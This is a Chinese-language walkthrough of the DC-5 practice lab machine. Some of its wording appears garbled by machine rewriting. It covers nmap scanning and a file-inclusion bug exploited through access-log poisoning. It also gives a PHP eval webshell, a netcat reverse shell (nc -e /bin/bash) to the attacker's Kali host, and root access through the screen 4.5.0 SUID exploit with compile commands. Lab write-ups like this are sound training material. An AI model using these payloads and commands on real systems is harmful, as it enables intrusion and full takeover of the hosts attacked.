1.取得靶机,将靶机复制在自己电脑上,打开靶机
选择编辑此虚拟机,点击网络配适器,选择NAT模式然后确定
开启此虚拟机
到这步后我们开启kali虚拟机,同样选择编辑此虚拟机,点击网络配适器,选择NAT模式然后确定
打开kali虚拟机,其密码为kali
我们先获取root权限,输入su root,password为123456(Linux内输入password是看不见的)
先用ifconfig查看kali的ip地址为192.168.126.129
我们用nmap扫描网络信息,输入nmap -sP 192.168.126.0/24 -oN nmap.sV
得到靶机ip:192.168.126.132,对其进行端口扫描
可以看到开放了80端口和111端口,111端口是RPC做事,觉得没有什么可以利用的点,我们去浏览器访问80端口试试(可以打开kali自带的火狐浏览器,利用kali自带浏览器前须要打开burpsuit,也可以用自己电脑的浏览器)
输入刚刚得到的靶机ip,例如我的便是http://192.168.126.132
创造这是一个动态页面,可以考试测验去提交一些东西。
我们点击右上角Contact,往下滑创造可以输入
提交后可以创造,本人电脑的Microsoft Edge由于改成了翻译系统,一样平常情形会显示DC-5 is alive
扫描web目录,输入dirb http://192.168.126.132
很可惜此处没有太多有代价的东西,连续浏览可以创造contact可以创造年份会随着页面刷新而刷新
之前在thinkyou.php中看到了这种情形(网页刷新一次,年份都会发生变革),因此我们预测thinkyou.php调用了footer.php,于是想到了文件包含漏洞,输入footer.php试试
瞥见页面变革,我们回到kali,用kali自带的burpsuite进行抓包
关于burpsuite的详细配置教程我放在其余一个文档里面,没有配置的小伙伴可以先配置一下
打开burpsuite后,返回浏览器界面
在开着intercept on的同时刷新浏览器页面(回到浏览器按下f5)burp会自动抓包
点击Action,选择send to Repeater发送到Repeater
利用access.log。抓包在burpsuite-repeater中,把url修正为一句话木马 Get <?php phpinfo();?> ,回显400 bad request
返回浏览器查看,哭瞥见页面发生变革
滑到最底下是这样的,可以瞥见显示了php信息,意识到可以通过这个办法写入木马
我们返回burpsuite,写入一句话木马 GET <?php @eval($_POST['1234'];?> .
(把稳,这里的POST['']里面的内容是可以变动的,也便是之后用蚁剑连接的密码
接着我们利用蚁剑连接,此处我的蚁剑是windows版本的,以是密码便是POST内的内容1234
点击添加数据
点击测试连接,可以瞥见连接成功
我们回到kali,输入nc -lvvp 1234开启这个端口的监听
然后在蚁剑中,点击右键,选择虚拟终端,输入nc -e /bin/bash 192.168.126.129 1234进行shell反弹
可以在kali中瞥见成功
返回kali交互式 输入python -c 'import pty;pty.spawn("/bin/bash")'
利用find / -perm -4000 2>/dev/null查找具有SUID权限的文件,创造screen-4.5.0。
利用searchsploit查找该命令漏洞:searchsploit screen 4.5.0 -w
两个文件是相同的,41152.txt是见告你怎么做,之前的靶机也涌现过,显然41154.sh已经把文件给了,以是选择下载41154.sh
创造有两个漏洞
先查看第一个
将第一个复制到桌面
cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh
查看该文件
创造其在 /tmp 路径下编译了两个 c,并实行了多少命令
按照脚本提示,先将第一部分内容写到libhax.c中(一共有三个部分)
第一步在桌面创建一个文件夹存放三个部分的脚本
利用命令vim创建第一个libhax.c
然后编译这个脚本
gcc -fPIC -shared -ldl -o libhax.so libhax.c
、
利用vim命令创建第二个rootshell.c,复制粘贴完内容后按下esc输入:wq保存退出
再编译
gcc -o rootshell rootshell.c
末了一个部分dc5.sh同理,但是须要把稳的是下面须要转换一下格式
实行完命令后,可以瞥见在桌面home/dc-5文件夹有五个文件
将带有.c的文件删除,在kali中利用rm命令
再回到文件夹内可以瞥见
然后我们回到中国蚁剑,将文件上传到tmp文件里面,须要把稳的是我们一定要讲文件传到根目录下,而不是var,/var是源码
然后重命名,将路径去掉
回到kali反弹的shell(步骤和之前一样),进入到天麻片、目录里面
然后为dc5.sh添加可以实行权限,输入chmod +x dc5.sh
验证权限,切换到/root根目录下找到flag,渗透成功
